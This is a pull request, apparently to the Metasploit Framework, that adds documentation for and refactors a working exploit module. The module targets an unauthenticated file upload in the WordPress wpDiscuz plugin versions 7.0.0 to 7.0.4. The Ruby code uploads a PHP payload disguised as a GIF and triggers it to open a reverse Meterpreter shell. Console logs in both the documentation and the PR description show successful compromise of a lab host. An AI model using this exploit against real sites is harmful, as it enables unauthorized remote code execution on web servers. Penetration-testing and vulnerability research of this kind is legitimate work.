### PR TITLE
Add documentation, add guards, and rubocop changes

### DIFF
--- a/documentation/modules/exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
-versions <= `v7.0.4` and >= `v7.0.0`. This flaw gave unauthenticated attackers
+versions >= `v7.0.0` and <= `v7.0.4`. This flaw gave unauthenticated attackers
 the ability to upload arbitrary files, including PHP files, and achieve remote
 code execution on a vulnerable site’s server.
 
@@ -30,7 +30,8 @@ Path to the target Wordpress blog.
 ```
 msf6 > use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhost 192.168.37.135rhost => 192.168.37.135
+msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhost 192.168.37.135
+rhost => 192.168.37.135
 msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set lhost 192.168.37.1
 lhost => 192.168.37.1
 msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set blogpath index.php/2021/06/23/hello-world/

--- a/documentation/modules/exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
+versions <= `v7.0.4` and >= `v7.0.0`. This flaw gave unauthenticated attackers
+the ability to upload arbitrary files, including PHP files, and achieve remote
+code execution on a vulnerable site’s server.
+
+A vulnerable version of the wpDiscuz plugin can be downloaded from [here](https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip).
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload`
+4. Do: `set BLOGPATH <path>`
+5. Do: `set RHOSTS <ip>`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+### BLOGPATH
+
+Path to the target Wordpress blog.
+
+## Scenarios
+
+### Wordpress `5.7.2` with wpDiscuz `7.0.4` on Ubuntu 18.04
+
+```
+msf6 > use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhost 192.168.37.135rhost => 192.168.37.135
+msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set blogpath index.php/2021/06/23/hello-world/
+blogpath => index.php/2021/06/23/hello-world/
+msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run
+
+[*] Started reverse TCP handler on 192.168.37.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[+] Payload uploaded as ksKFgaD.php
+[*] Calling payload...
+[*] Sending stage (39282 bytes) to 192.168.37.135
+[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:40444) at 2021-06-23 18:11:41 -0500
+[!] This exploit may require manual cleanup of 'ksKFgaD.php' on the target
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

--- a/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
@@ -4,103 +4,116 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-    Rank = ExcellentRanking
+  Rank = ExcellentRanking
 
-    include Msf::Exploit::Remote::HTTP::Wordpress
-    include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
-    def initialize(info = {})
-        super(update_info(info,
-          'Name'           => 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability',
-          'Description'    => %q{
-            This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
-            version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
-            including PHP files, and achieve remote code execution on a vulnerable site’s server.
-          },
-          'Author'         =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability',
+        'Description' => %q{
+          This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
+          versions >= `7.0.0` and <= `7.0.4`. This flaw gave unauthenticated attackers the ability
+          to upload arbitrary files, including PHP files, and achieve remote code execution on a
+          vulnerable site’s server.
+        },
+        'Author' =>
             [
               'Chloe Chamberland', # Vulnerability Discovery, initial msf module
               'Hoa Nguyen - SunCSR'  # Metasploit Module Pull Request
             ],
-          'License'        => MSF_LICENSE,
-          'References'     =>
+        'License' => MSF_LICENSE,
+        'References' =>
             [
+              ['CVE', '2020-24186'],
               ['WPVDB', '10333'],
               ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
-              ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
-              ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
+              ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
+              ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
             ],
-          'Privileged'     => false,
-          'Platform'       => 'php',
-          'Arch'           => ARCH_PHP,
-          'Targets'        => [['wpDiscuz < 7.0.5', {}]],
-          'DisclosureDate' => 'Feb 21 2020',
-          'DefaultOptions' =>
+        'Privileged' => false,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['wpDiscuz < 7.0.5', {}]],
+        'DisclosureDate' => '2020-02-21',
+        'DefaultOptions' =>
           {
             'PAYLOAD' => 'php/meterpreter/reverse_tcp'
           },
-          'DefaultTarget'  => 0))
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [ARTIFACTS_ON_DISK]
+          }
+      )
+      )
 
-      register_options [
-        OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]),
+    register_options [
+      OptString.new('BLOGPATH', [true, 'Link to the post [/index.php/2020/12/12/post1]', nil]),
     ]
+  end
+
+  def check
+    check_plugin_version_from_readme('wpdiscuz', '7.0.5', '7.0.0')
+  end
+
+  def blogpath
+    datastore['BLOGPATH']
+  end
+
+  def find_wmusecurity_id
+    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath) })
+    wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/)&.captures
+    unless wmusecurity_id
+      fail_with(Failure::NotFound, 'Failed to retrieve the wmusecurity id')
     end
 
-    def check
-        check_plugin_version_from_readme('wpdiscuz','7.0.5')
+    wmusecurity_id
+  end
+
+  def exploit
+    wmusecurity_id = find_wmusecurity_id[0]
+    php_page_name = "#{rand_text_alpha(5..12)}.php"
+    data = Rex::MIME::Message.new
+    data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
+    data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
+    data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
+    data.add_part('1', nil, nil, 'form-data; name="postId"')
+    data.add_part("GIF8#{payload.encoded}", 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Server did not respond') unless res
+    unless res.code == 200 && res.body =~ /#{php_page_name}/
+      fail_with(Failure::UnexpectedReply, 'Unable to deploy payload')
     end
 
-    def blogpath
-        datastore['BLOGPATH']
-    end
+    json_data = JSON.parse(res.body)
+    upload_url = json_data.dig('data', 'previewsData', 'images', 0, 'url')
+    fail_with(Failure::UnexpectedReply, "#{peer} - Upload was unsuccessful") unless upload_url
+    wp_shell_upload = upload_url.split('/').last
+    fail_with(Failure::NotFound, "#{peer} - Path not found in response body") unless wp_shell_upload.ends_with?('.php')
+    print_good("Payload uploaded as #{php_page_name}")
+    register_file_for_cleanup(php_page_name)
 
-    def find_wmusecurity_id
-      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5)
-      wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
-      return wmusecurity_id
-    end
-
-    def exploit
-        wmusecurity_id = find_wmusecurity_id[0]
-        php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
-        data = Rex::MIME::Message.new
-        data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
-        data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
-        data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
-        data.add_part('1', nil, nil, 'form-data; name="postId"')
-        data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
-        post_data = data.to_s
-
-        res = send_request_cgi(
-          'uri'       => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'),
-          'method'    => 'POST',
-          'ctype'     => "multipart/form-data; boundary=#{data.bound}",
-          'data'      => post_data
-        )
-
-        time = Time.new
-        year = time.year.to_s
-        month = "%02d" % time.month
-
-        regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
-        wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"")
-
-        if res
-          if res.code == 200 && res.body =~ /#{php_page_name}/
-            print_good("Payload uploaded as #{php_page_name}")
-            register_files_for_cleanup(php_page_name)
-          else
-            fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
-          end
-        else
-          fail_with(Failure::Unknown, "#{peer} - Server did not answer")
-        end
-
-        print_status("Calling payload...")
-        send_request_cgi(
-          { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)},
-          5
-        )
-
-    end
+    print_status('Calling payload...')
+    time = Time.new
+    year = time.year.to_s
+    month = format('%02d', time.month)
+    send_request_cgi(
+      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year.to_s, month.to_s, wp_shell_upload) }
+    )
+  end
 end

--- a/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' =>
             [
               'Chloe Chamberland', # Vulnerability Discovery, initial msf module
-              'Hoa Nguyen - SunCSR'  # Metasploit Module Pull Request
+              'Hoa Nguyen - SunCSR'  # Metasploit Module enhancement
             ],
         'License' => MSF_LICENSE,
         'References' =>


### PR DESCRIPTION
Hey @noraj, this adds documentation for your module along with the suggested guards and formatting changes from PR review and Rubocop. Please let me know if these changes work for you, thanks!

Here's test output against version `7.0.4` of the wpDiscuz plugin:

```
msf6 > use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhost 192.168.37.135
rhost => 192.168.37.135
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set blogpath index.php/2021/06/23/hello-world/
blogpath => index.php/2021/06/23/hello-world/
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Payload uploaded as ljvsEX.php
[*] Calling payload...
[*] Sending stage (39282 bytes) to 192.168.37.135
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:41204) at 2021-06-23 18:49:22 -0500
[!] This exploit may require manual cleanup of 'ljvsEX.php' on the target

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```